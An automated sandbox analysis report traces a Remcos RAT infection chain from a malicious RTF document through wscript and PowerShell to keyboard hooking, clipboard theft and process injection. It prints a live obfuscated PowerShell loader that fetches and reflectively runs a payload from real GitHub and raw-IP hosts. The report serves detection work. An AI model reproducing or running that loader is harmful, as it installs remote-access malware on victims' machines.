                  Source: powershell.exe, 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: S7UYq0.url.0.drString found in binary or memory: https://og1.in/S7UYq0
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                  Source: powershell.exe, 0000000C.00000002.443014450.000000000238A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                  Source: powershell.exe, 0000000C.00000002.443014450.000000000238A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.443014450.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.446007440.0000000004FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: RegAsm.exe, 00000010.00000002.465963894.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.466045684.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.466001637.0000000002E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.467538863.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.467552558.0000000002D30000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.467525342.0000000002B3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                  Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.453958713.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                  Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49163 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000013_2_0040A2F3
                  Installs a global keyboard hook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,13_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,13_2_004168FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_0040987A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_004098E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_00406DFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,17_2_00406E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_004068B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,18_2_004072B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,13_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,13_2_0040A41B
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4076, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4076, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\notpad0\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Contains functionalty to change the wallpaper
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041CA73 SystemParametersInfoW,13_2_0041CA73

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3864, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 4076, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A16B3B5D.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Microsoft Office drops suspicious files
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\S7UYq0.urlJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\uc on 91.134.96.177.urlJump to behavior
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,13_2_0041812A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,13_2_0041330D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,13_2_0041BBC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,13_2_0041BB9A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00401806 NtdllDefWindowProc_W,16_2_00401806
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004018C0 NtdllDefWindowProc_W,16_2_004018C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004016FD NtdllDefWindowProc_A,17_2_004016FD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004017B7 NtdllDefWindowProc_A,17_2_004017B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00402CAC NtdllDefWindowProc_A,18_2_00402CAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00402D66 NtdllDefWindowProc_A,18_2_00402D66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,13_2_004167EF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043706A13_2_0043706A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041400513_2_00414005
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043E11C13_2_0043E11C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004541D913_2_004541D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004381E813_2_004381E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041F18B13_2_0041F18B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044627013_2_00446270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043E34B13_2_0043E34B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004533AB13_2_004533AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042742E13_2_0042742E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043756613_2_00437566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043E5A813_2_0043E5A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004387F013_2_004387F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043797E13_2_0043797E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004339D713_2_004339D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044DA4913_2_0044DA49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00427AD713_2_00427AD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041DBF313_2_0041DBF3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00427C4013_2_00427C40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00437DB313_2_00437DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00435EEB13_2_00435EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0043DEED13_2_0043DEED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00426E9F13_2_00426E9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1001719413_2_10017194
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_1000B5C113_2_1000B5C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044B04016_2_0044B040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043610D16_2_0043610D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044731016_2_00447310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044A49016_2_0044A490
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040755A16_2_0040755A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0043C56016_2_0043C560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044B61016_2_0044B610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044D6C016_2_0044D6C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004476F016_2_004476F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044B87016_2_0044B870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044081D16_2_0044081D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041495716_2_00414957
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004079EE16_2_004079EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00407AEB16_2_00407AEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044AA8016_2_0044AA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00412AA916_2_00412AA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00404B7416_2_00404B74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00404B0316_2_00404B03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044BBD816_2_0044BBD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00404BE516_2_00404BE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00404C7616_2_00404C76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00415CFE16_2_00415CFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00416D7216_2_00416D72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00446D3016_2_00446D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00446D8B16_2_00446D8B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00406E8F16_2_00406E8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040503817_2_00405038
